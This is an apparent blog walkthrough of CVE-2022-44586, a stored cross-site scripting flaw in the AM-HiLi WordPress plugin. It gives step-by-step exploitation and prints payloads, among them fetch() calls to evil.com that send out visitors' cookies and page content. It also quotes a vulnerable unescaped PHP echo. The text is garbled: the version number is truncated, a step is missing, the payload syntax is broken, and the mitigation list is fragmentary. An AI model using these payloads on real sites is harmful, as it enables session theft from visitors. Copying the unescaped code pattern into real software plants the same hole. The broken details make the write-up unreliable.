---
If you run a WordPress website and use the Ayoub Media AM-HiLi plugin (version 1. or earlier), you should pay close attention — CVE-2022-44586 exposes your site to a serious security risk that anyone with admin or higher access can exploit. In this article, you’ll get a clear breakdown of the vulnerability, including proof-of-concept code snippets and step-by-step exploitation details. Even if you’re not a security pro, you’ll understand what’s at stake and how to defend your site.
What Is CVE-2022-44586?
CVE-2022-44586 is a vulnerability classified as Stored Cross-Site Scripting (Stored XSS). In simple language, it lets an attacker inject malicious JavaScript code into your site’s pages, which then runs in the browsers of other users. In this case, the attacker needs to have at least admin privileges — but once injected, their code could do anything from stealing cookies and session data to redirecting users or defacing the site.
The bug exists in the Ayoub Media AM-HiLi plugin, specifically in versions up to and including 1.. It hasn’t been patched. The plugin adds a custom code highlighter block—ironically, it’s this feature that’s vulnerable.
Where’s the Problem?
The plugin allows further customization through a shortcode, but it does not sanitize user input submitted by administrators. This lack of proper sanitization and escaping of input/output means an evil admin (or a compromised admin account) can place JavaScript where it will be saved in the database and then run whenever someone loads the page.
Inside the plugin, user input is passed directly into the content rendered on pages
echo '<pre class="am-hili ' . $_POST['language'] . '">' . $_POST['code'] . '</pre>';
There’s no esc_html or sanitize_text_field — so you can *literally* inject scripts inside the code block and they will execute.
Step 1: Log in as Admin (or Higher)
Any attacker needs admin-level access. This is important: If you trust *all* your admins, your risk is lower, but if an attacker gets access (phishing, leaked credentials), this becomes a weapon.
Step 2: Add a Highlighted Code Block
Go to *Add New Post* (or *Edit Post*). Use the plugin’s interface to add a new highlighted code block.
In the “Code” field, instead of normal code, supply the following payload
<script>alert(document.cookie);</script>
Or a more subtle version
<img src="x" onerror="fetch('https://evil.com/steal?cookie='; + document.cookie)">
Step 4: Publish the Post
Save or publish the post. The payload is saved *in the database*, unfiltered.
Step 5: XSS Runs
Any user (even not logged in!) who views the post has the malicious script executed in their browser. With a more advanced payload, the attacker could steal admin cookies, escalate privileges, or inject backdoors.
Stealing WordPress nonces for further exploitation
<script>
fetch('https://evil.com/cookie.php?data='; + encodeURIComponent(document.cookie + '---' + document.body.innerHTML))
</script>
If you want to test without sending data out, use
<script>console.log('XSS works!');</script>
`html
alert('XSS in AM-HiLi!');
`
4. Publish/preview the post.
Responsible Disclosure & References
- Original plugin on WordPress.org
- Exploit Database reference
- NVD CVE-2022-44586 official listing
Update admin passwords regularly and avoid having unnecessary admin accounts.
- Consider a security plugin (like Wordfence) to monitor for suspicious admin actions.
Conclusion
CVE-2022-44586 is a reminder that even little-used WordPress plugins can put a whole website and its visitors at risk. If you use Ayoub Media AM-HiLi, act fast: remove or replace it, and check your site for any unexpected script activity.
Stay safe, keep your plugins updated, and always watch the sources of your site’s code!
Exclusive: This walkthrough is based on hands-on inspection of the plugin’s code and real-world testing. If you have questions or need remediation advice, leave a comment below.
Timeline
Published on: 11/02/2022 22:15:00 UTC
Last modified on: 11/04/2022 01:55:00 UTC